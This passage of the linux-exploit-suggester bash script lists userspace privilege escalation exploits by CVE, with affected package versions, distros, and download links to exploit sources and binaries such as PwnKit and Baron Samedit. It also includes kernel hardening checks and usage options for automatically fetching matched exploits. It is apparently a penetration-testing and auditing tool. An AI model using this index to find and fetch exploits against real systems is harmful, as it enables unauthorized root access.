Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/130
src-url: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
exploit-db: 36747
author: Tavis Ormandy
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport)
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport) 2
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04.2
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
exploit-db: 36782
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3202]${txtrst} fuse (fusermount)
Reqs: pkg=fuse,ver<2.9.3
Tags: debian=7.0|8.0,ubuntu=*
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/520
exploit-db: 37089
Comments: Needs cron or system admin interaction
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1815]${txtrst} setroubleshoot
Reqs: pkg=setroubleshoot,ver<3.2.22
Tags: fedora=21
Rank: 1
exploit-db: 36564
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3246]${txtrst} userhelper
Reqs: pkg=libuser,ver<=0.60
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Rank: 1
analysis-url: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt 
exploit-db: 37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-5287]${txtrst} abrt/sosreport-rhel7
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2015/12/01/1
src-url: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
exploit-db: 38832
author: rebel
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-6565]${txtrst} not_an_sshnuke
Reqs: pkg=openssh-server,ver>=6.8,ver<=6.9
Tags:
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/01/26/2
exploit-db: 41173
author: Federico Bento
Comments: Needs admin interaction (root user needs to login via ssh to trigger exploitation)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8612]${txtrst} blueman set_dhcp_handler d-bus privesc
Reqs: pkg=blueman,ver<2.0.3
Tags: debian=8{blueman:1.23}
Rank: 1
analysis-url: https://twitter.com/thegrugq/status/677809527882813440
exploit-db: 46186
author: Sebastian Krahmer
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1240]${txtrst} tomcat-rootprivesc-deb.sh
Reqs: pkg=tomcat
Tags: debian=8,ubuntu=16.04
Rank: 1
analysis-url: https://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
src-url: http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
exploit-db: 40450
author: Dawid Golunski
Comments: Affects only Debian-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1247]${txtrst} nginxed-root.sh
Reqs: pkg=nginx|nginx-full,ver<1.10.3
Tags: debian=8,ubuntu=14.04|16.04|16.10
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
src-url: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
exploit-db: 40768
author: Dawid Golunski
Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim)
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39549
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim) 2
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39535
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4989]${txtrst} setroubleshoot 2
Reqs: pkg=setroubleshoot
Tags: RHEL=6|7
Rank: 1
analysis-url: https://c-skills.blogspot.com/2016/06/lets-feed-attacker-input-to-sh-c-to-see.html
src-url: https://github.com/stealth/troubleshooter/raw/master/straight-shooter.c
exploit-db:
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5425]${txtrst} tomcat-RH-root.sh
Reqs: pkg=tomcat
Tags: RHEL=7
Rank: 1
analysis-url: http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
src-url: http://legalhackers.com/exploits/tomcat-RH-root.sh
exploit-db: 40488
author: Dawid Golunski
Comments: Affects only RedHat-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-6663,CVE-2016-6664|CVE-2016-6662]${txtrst} mysql-exploit-chain
Reqs: pkg=mysql-server|mariadb-server,ver<5.5.52
Tags: ubuntu=16.04.1
Rank: 1
analysis-url: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
src-url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
exploit-db: 40678
author: Dawid Golunski
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9566]${txtrst} nagios-root-privesc
Reqs: pkg=nagios,ver<4.2.4
Tags:
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
src-url: https://legalhackers.com/exploits/CVE-2016-9566/nagios-root-privesc.sh
exploit-db: 40921
author: Dawid Golunski
Comments: Allows priv escalation from nagios user or nagios group
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-0358]${txtrst} ntfs-3g-modprobe
Reqs: pkg=ntfs-3g,ver<2017.4
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
exploit-db: 41356
author: Jann Horn
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5899]${txtrst} s-nail-privget
Reqs: pkg=s-nail,ver<14.8.16
Tags: ubuntu=16.04,manjaro=16.10
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2017/01/27/7
src-url: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
author: wapiflapi (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} Sudoer-to-root
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags: RHEL=7{sudo:1.8.6p7}
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
exploit-db: 42183
author: Qualys
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} sudopwn
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags:
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
exploit-db:
author: c0d3z3r0
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000370]${txtrst} linux_ldso_hwcap
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
exploit-db: 42274
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000371]${txtrst} linux_ldso_dynamic
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
exploit-db: 42276
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000379]${txtrst} linux_ldso_hwcap_64
Reqs: pkg=glibc|libc6,ver<=2.25,x86_64
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
exploit-db: 42275
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000370,CVE-2017-1000371]${txtrst} linux_offset2lib
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
exploit-db: 42273
author: Qualys
Comments: Uses "Stack Clash" technique
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-1000001]${txtrst} RationalLove
Reqs: pkg=glibc|libc6,ver<2.27,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,x86_64
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Rank: 1
analysis-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
src-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2018-1000001/RationalLove
exploit-db: 43775
author: halfdog
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-10900]${txtrst} vpnc_privesc.py
Reqs: pkg=networkmanager-vpnc|network-manager-vpnc,ver<1.2.6
Tags: ubuntu=16.04{network-manager-vpnc:1.1.93-1},debian=9.0{network-manager-vpnc:1.2.4-4},manjaro=17
Rank: 1
analysis-url: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
src-url: https://bugzilla.novell.com/attachment.cgi?id=779110
exploit-db: 45313
author: Denis Andzakovic
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-14665]${txtrst} raptor_xorgy
Reqs: pkg=xorg-x11-server-Xorg,cmd:[ -u /usr/bin/Xorg ]
Tags: centos=7.4
Rank: 1
analysis-url: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
exploit-db: 45922
author: raptor
Comments: X.Org Server before 1.20.3 is vulnerable. Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-7304]${txtrst} dirty_sock
Reqs: pkg=snapd,ver<2.37,cmd:[ -S /run/snapd.socket ]
Tags: ubuntu=18.10,mint=19
Rank: 1
analysis-url: https://initblog.com/2019/dirty-sock/
exploit-db: 46361
exploit-db: 46362
src-url: https://github.com/initstring/dirty_sock/archive/master.zip
author: InitString
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-10149]${txtrst} raptor_exim_wiz
Reqs: pkg=exim|exim4,ver>=4.87,ver<=4.91
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
exploit-db: 46996
author: raptor
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-12181]${txtrst} Serv-U FTP Server
Reqs: cmd:[ -u /usr/local/Serv-U/Serv-U ]
Tags: debian=9
Rank: 1
analysis-url: https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
exploit-db: 47009
src-url: https://raw.githubusercontent.com/guywhataguy/CVE-2019-12181/master/servu-pe-cve-2019-12181.c
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-12181/SUroot
author: Guy Levin (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Modified version at 'ext-url' uses bash exec technique, rather than compiling with gcc.
EOF
)
EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18862]${txtrst} GNU Mailutils 2.0 <= 3.7 maidag url local root (CVE-2019-18862)
Reqs: cmd:[ -u /usr/local/sbin/maidag ]
Tags: 
Rank: 1
analysis-url: https://www.mike-gualtieri.com/posts/finding-a-decade-old-flaw-in-gnu-mailutils
ext-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.cron.sh
src-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.ldpreload.sh
author: bcoles
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18634]${txtrst} sudo pwfeedback
Reqs: pkg=sudo,ver<1.8.31
Tags: mint=19
Rank: 1
analysis-url: https://dylankatz.com/Analysis-of-CVE-2019-18634/
src-url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
author: saleemrashid
Comments: sudo configuration requires pwfeedback to be enabled.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2020-9470]${txtrst} Wing FTP Server <= 6.2.5 LPE
Reqs: cmd:[ -x /etc/init.d/wftpserver ]
Tags: ubuntu=18
Rank: 1
analysis-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php
src-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.sh
exploit-db: 48154
author: Cary Cooper
Comments: Requires an administrator to login via the web interface.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit
Reqs: pkg=sudo,ver<1.9.5p2
Tags: mint=19,ubuntu=18|20, debian=10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
author: blasty
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit 2
Reqs: pkg=sudo,ver<1.9.5p2
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
author: worawit
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5618]${txtrst} setuid screen v4.5.0 LPE
Reqs: pkg=screen,ver==4.5.0
Tags: 
Rank: 1
analysis-url: https://seclists.org/oss-sec/2017/q1/184
exploit-db: https://www.exploit-db.com/exploits/41154
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
Reqs: pkg=polkit|policykit-1,ver<=0.105-31
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Rank: 1
analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
author: berdav
EOF
)

###########################################################
## security related HW/kernel features
###########################################################
n=0

FEATURES[((n++))]=$(cat <<EOF
section: Mainline kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Kernel Page Table Isolation (PTI) support
available: ver>=4.15
enabled: cmd:grep -Eqi '\spti' /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/pti.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector support
available: CONFIG_HAVE_STACKPROTECTOR=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector STRONG support
available: CONFIG_STACKPROTECTOR_STRONG=y,ver>=3.14
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Low address space to protect from user allocation
available: CONFIG_DEFAULT_MMAP_MIN_ADDR=[0-9]+
enabled: sysctl:vm.mmap_min_addr!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Prevent users from using ptrace to examine the memory and state of their processes
available: CONFIG_SECURITY_YAMA=y
enabled: sysctl:kernel.yama.ptrace_scope!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/yama_ptrace_scope.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict unprivileged access to kernel syslog
available: CONFIG_SECURITY_DMESG_RESTRICT=y,ver>=2.6.37
enabled: sysctl:kernel.dmesg_restrict!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Randomize the address of the kernel image (KASLR)
available: CONFIG_RANDOMIZE_BASE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/kaslr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardened user copy support
available: CONFIG_HARDENED_USERCOPY=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/hardened_usercopy.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Make kernel text and rodata read-only
available: CONFIG_STRICT_KERNEL_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_kernel_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Set loadable kernel module data as NX and text as RO
available: CONFIG_STRICT_MODULE_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_module_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: BUG() conditions reporting
available: CONFIG_BUG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Additional 'cred' struct checks
available: CONFIG_DEBUG_CREDENTIALS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_credentials.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Sanity checks for notifier call chains
available: CONFIG_DEBUG_NOTIFIERS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_notifiers.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Extended checks for linked-lists walking
available: CONFIG_DEBUG_LIST=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_list.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks on scatter-gather tables
available: CONFIG_DEBUG_SG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_sg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for data structure corruptions
available: CONFIG_BUG_ON_DATA_CORRUPTION=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug_on_data_corruption.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for a stack overrun on calls to 'schedule'
available: CONFIG_SCHED_STACK_END_CHECK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/sched_stack_end_check.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist order randomization on new pages creation
available: CONFIG_SLAB_FREELIST_RANDOM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_random.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist metadata hardening
available: CONFIG_SLAB_FREELIST_HARDENED=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_hardened.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Allocator validation checking
available: CONFIG_SLUB_DEBUG_ON=y,cmd:! grep 'slub_debug=-' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slub_debug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Virtually-mapped kernel stacks with guard pages
available: CONFIG_VMAP_STACK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/vmap_stack.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Pages poisoning after free_pages() call
available: CONFIG_PAGE_POISONING=y
enabled: cmd: grep 'page_poison=1' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/page_poisoning.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Using 'refcount_t' instead of 'atomic_t'
available: CONFIG_REFCOUNT_FULL=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/refcount_full.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardening common str/mem functions against buffer overflows
available: CONFIG_FORTIFY_SOURCE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/fortify_source.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict /dev/mem access
available: CONFIG_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict I/O access to /dev/mem
available: CONFIG_IO_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/io_strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Hardware-based protection features:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Execution Protection (SMEP) support
available: ver>=3.0
enabled: cmd:grep -qi smep /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smep.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Access Prevention (SMAP) support
available: ver>=3.7
enabled: cmd:grep -qi smap /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smap.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: 3rd party kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Grsecurity
available: CONFIG_GRKERNSEC=y
enabled: cmd:test -c /dev/grsec
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: PaX
available: CONFIG_PAX=y
enabled: cmd:test -x /sbin/paxctl
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Linux Kernel Runtime Guard (LKRG) kernel module
enabled: cmd:test -d /proc/sys/lkrg
analysis-url: https://github.com/mzet-/les-res/blob/master/features/lkrg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Attack Surface:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: User namespaces for unprivileged accounts
available: CONFIG_USER_NS=y
enabled: sysctl:kernel.unprivileged_userns_clone==1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/user_ns.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Unprivileged access to bpf() system call
available: CONFIG_BPF_SYSCALL=y
enabled: sysctl:kernel.unprivileged_bpf_disabled!=1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering
available: CONFIG_SECCOMP=y
enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/mem access
available: CONFIG_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/kmem access
available: CONFIG_DEVKMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devkmem.md
EOF
)


version() {
    echo "linux-exploit-suggester "$VERSION", mzet, https://z-labs.eu, March 2019"
}

usage() {
    echo "LES ver. $VERSION (https://github.com/mzet-/linux-exploit-suggester) by @_mzet_"
    echo
    echo "Usage: linux-exploit-suggester.sh [OPTIONS]"
    echo
    echo " -V | --version               - print version of this script"
    echo " -h | --help                  - print this help"
    echo " -k | --kernel <version>      - provide kernel version"
    echo " -u | --uname <string>        - provide 'uname -a' string"
    echo " --skip-more-checks           - do not perform additional checks (kernel config, sysctl) to determine if exploit is applicable"
    echo " --skip-pkg-versions          - skip checking for exact userspace package version (helps to avoid false negatives)"
    echo " -p | --pkglist-file <file>   - provide file with 'dpkg -l' or 'rpm -qa' command output"
    echo " --cvelist-file <file>        - provide file with Linux kernel CVEs list"
    echo " --checksec                   - list security related features for your HW/kernel"
    echo " -s | --fetch-sources         - automatically downloads source for matched exploit"
    echo " -b | --fetch-binaries        - automatically downloads binary for matched exploit if available"
    echo " -f | --full                  - show full info about matched exploit"
    echo " -g | --short                 - show shorten info about matched exploit"
    echo " --kernelspace-only           - show only kernel vulnerabilities"
    echo " --userspace-only             - show only userspace vulnerabilities"
    echo " -d | --show-dos              - show also DoSes in results"
}

exitWithErrMsg() {
    echo "$1" 1>&2
    exit 1
}

# extracts all information from output of 'uname -a' command
parseUname() {
    local uname=$1

    KERNEL=$(echo "$uname" | awk '{print $3}' | cut -d '-' -f 1)
    KERNEL_ALL=$(echo "$uname" | awk '{print $3}')
    ARCH=$(echo "$uname" | awk '{print $(NF-1)}')

    OS=""
    echo "$uname" | grep -q -i 'deb' && OS="debian"
    echo "$uname" | grep -q -i 'ubuntu' && OS="ubuntu"
    echo "$uname" | grep -q -i '\-ARCH' && OS="arch"
    echo "$uname" | grep -q -i '\-deepin' && OS="deepin"
    echo "$uname" | grep -q -i '\-MANJARO' && OS="manjaro"
    echo "$uname" | grep -q -i '\.fc' && OS="fedora"
    echo "$uname" | grep -q -i '\.el' && OS="RHEL"
    echo "$uname" | grep -q -i '\.mga' && OS="mageia"

    # 'uname -a' output doesn't contain distribution number (at least not in case of all distros)
}

getPkgList() {
    local distro=$1
    local pkglist_file=$2
    
    # take package listing from provided file & detect if it's 'rpm -qa' listing or 'dpkg -l' or 'pacman -Q' listing of not recognized listing
    if [ "$opt_pkglist_file" = "true" -a -e "$pkglist_file" ]; then

        # ubuntu/debian package listing file
        if [ $(head -1 "$pkglist_file" | grep 'Desired=Unknown/Install/Remove/Purge/Hold') ]; then
